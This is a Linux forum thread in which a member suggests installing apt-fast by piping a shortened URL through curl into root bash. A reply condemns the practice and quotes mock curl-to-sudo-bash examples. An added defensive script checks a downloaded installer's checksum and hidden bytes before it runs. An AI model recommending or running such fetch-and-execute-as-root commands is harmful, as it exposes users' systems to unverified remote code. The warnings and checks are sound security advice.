apt-fast upgrade


  • This topic has 4 replies, 2 voices, and was last updated Feb 21-1:02 pm by Anonymous.
  • #6798
    Member
    koolstofje

      Anyone familiar with apt-fast upgrade?
      Downloading packages is much faster here...

      sudo apt-get install curl git

      sudo apt-get install aria2

      sudo /bin/bash -c "$(curl -sL http://git.io/vokNn)"

      #6799
      Anonymous

        No!
        THAT IS A TERRIBLE “TIP”

        DOWNLOADING (OR CURL OR WGET) A SCRIPT FROM THE INTERNET
        (OR A PACKAGE NOT KNOWN TO WORK WITH THE LINUX DISTRIBUTION INSTALLED ON YOUR SYSTEM)
        AND BLINDLY EXECUTING IT, WITH ROOT PERMISSION,
        IS A BAD (FOOLISH) PRACTICE !

        What are the security measures to protect a Linux machine from Ransomware?

        “Hardening” is only half a solution.
        Here are a few “common sense” best practices:

        Be mindful when running ‘code found online’
        and
        Never copy/paste web-snipped code directly into terminal !
        ref: http://nakedsecurity.sophos.com/2016/05/26/why-you-cant-trust-things-you-cut-and-paste-from-web-pages/
        ref: http://thejh.net/misc/website-terminal-copy-paste
        ref: http://news.ycombinator.com/item?id=5508225
        ref: http://www.reddit.com/r/netsec/comments/1bv359/dont_copypaste_from_website_to_terminal_demo/

        Similarly, I would never paste a found-on-the-web command line involving curl (or wget) …and sudo (and/or sh or bash or another shell):
        No! curl http:/gitmeuptodate/iwantapony ………. | sudo -h somescript.sh
        No! sudo /bin/bash -c "$(curl -sL http://happysite.com/bestest_evah_fix0r_freestuff)"

        After downloading “codez” or “scripts” and before executing, inspect the content of the code to ensure it is safe.
        If you can’t understand the program’s code, instead of blindly executing it, ask a trusted friend to inspect its content !
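
A defender-side gate for the download-then-inspect advice above, added here as an example and not part of the thread: it refuses a fetched script unless it matches a checksum obtained separately from the script (the demo computes the hash locally on a constructed file, purely so it runs offline) and contains no hidden non-printable bytes, before a human reads it and decides whether to run it under sudo.

```shell
#!/bin/sh
# check_script FILE EXPECTED_SHA256
# Returns 0 when FILE matches the checksum and contains only printable
# text, 1 otherwise (reason on stderr). The checksum must come from a
# source separate from the script itself (release page, signed SUMS file).
check_script() {
    file="$1"; expected="$2"
    [ -f "$file" ] || { echo "no such file: $file" >&2; return 1; }

    # Integrity: a tampered, truncated or swapped download fails here.
    actual=$(sha256sum "$file" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        echo "checksum mismatch: expected $expected, got $actual" >&2
        return 1
    fi

    # Hidden content: control characters or zero-width Unicode are what
    # web-to-terminal paste tricks rely on, so refuse rather than guess.
    if LC_ALL=C grep -q '[^[:print:][:space:]]' "$file"; then
        echo "non-printable bytes in $file: inspect it before running" >&2
        return 1
    fi
    return 0
}

# Demo on a constructed installer script (no network, no sudo). The hash
# is computed locally only for the demo; in real use it comes from the
# publisher, fetched through a different channel than the script.
demo() {
    tmp=$(mktemp)
    printf '#!/bin/sh\necho "installing apt-fast"\n' > "$tmp"
    good=$(sha256sum "$tmp" | cut -d' ' -f1)
    check_script "$tmp" "$good" && echo "clean: read $tmp, then decide"
    # Same script with a zero-width space smuggled in: rejected.
    printf '#!/bin/sh\necho "installing\342\200\213 apt-fast"\n' > "$tmp"
    check_script "$tmp" "$(sha256sum "$tmp" | cut -d' ' -f1)" || echo "rejected"
    rm -f "$tmp"
}
demo
```

In practice: `curl -sL -o install.sh URL`, obtain the published hash, run `check_script install.sh HASH`, read install.sh, and only then run it with sudo.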

        #6800
        Anonymous

          Some folks will disagree with the cautionary tone expressed in my post, above.
          Some folks, for the sake of “convenience” (instant gratification) will ignore the cautionary tone expressed in my post, above.

          Some “official” project sites and/or GitHub repos
          (operated by hipsters, targeting users seeking instant gratification)
          will explicitly instruct “easy! To install, just paste this handy curl sudo bash and voilà…”

          NONETHELESS, DOING SO IS A BAD (FOOLISH) PRACTICE !

          Sigh.
          Those who didn’t learn from (too young to remember?) the decades-long plague of windoze malware
          are destined to repeat it.

          #6802
          Member
          koolstofje

            Yes, you are right.
            So far everything is OK here, hehe.

            #6804
            Anonymous

              Well, thanks for providing the opportunity for me to post here that cautionary “Public Service Announcement” (already posted to the MX forum).
              I’ve tried to present “both sides”; the practice of trading security for convenience is arguably not an issue of right vs wrong.

              Use of (installation of software from) PPAs merits the same caution
              (accountability ~~ can you even determine the given name of person(s) uploading to a PPA repository?)
              (trustworthiness ~~ is a given PPA hosted on secure infrastructure or, eeeeek!, a vulnerable shared-hosting webserver?)
              yet across the Linux ecosystem we can notice growing acceptance of their use.

              Sadly, across distros, this naïveté is often at play behind-the-scenes as well.
              A “package maintainer” (or user of a distro employing source-based pkg management) conveniently clicks/runs a pkgbuild script
              which oh-so-conveniently downloads from github|ppa|wherever and compiles and installs, or crams it into an installable package.
              Even if downloaded “via https, from a trusted source”, doesn’t each package maintainer take pride in fulfilling the role entrusted to them
              by AT LEAST inspecting the configurable default preferences within the downloaded source package?
              No, too often they do not; they engage in “trading security for convenience” due to time constraints — much work, and too few (volunteer) packagers.
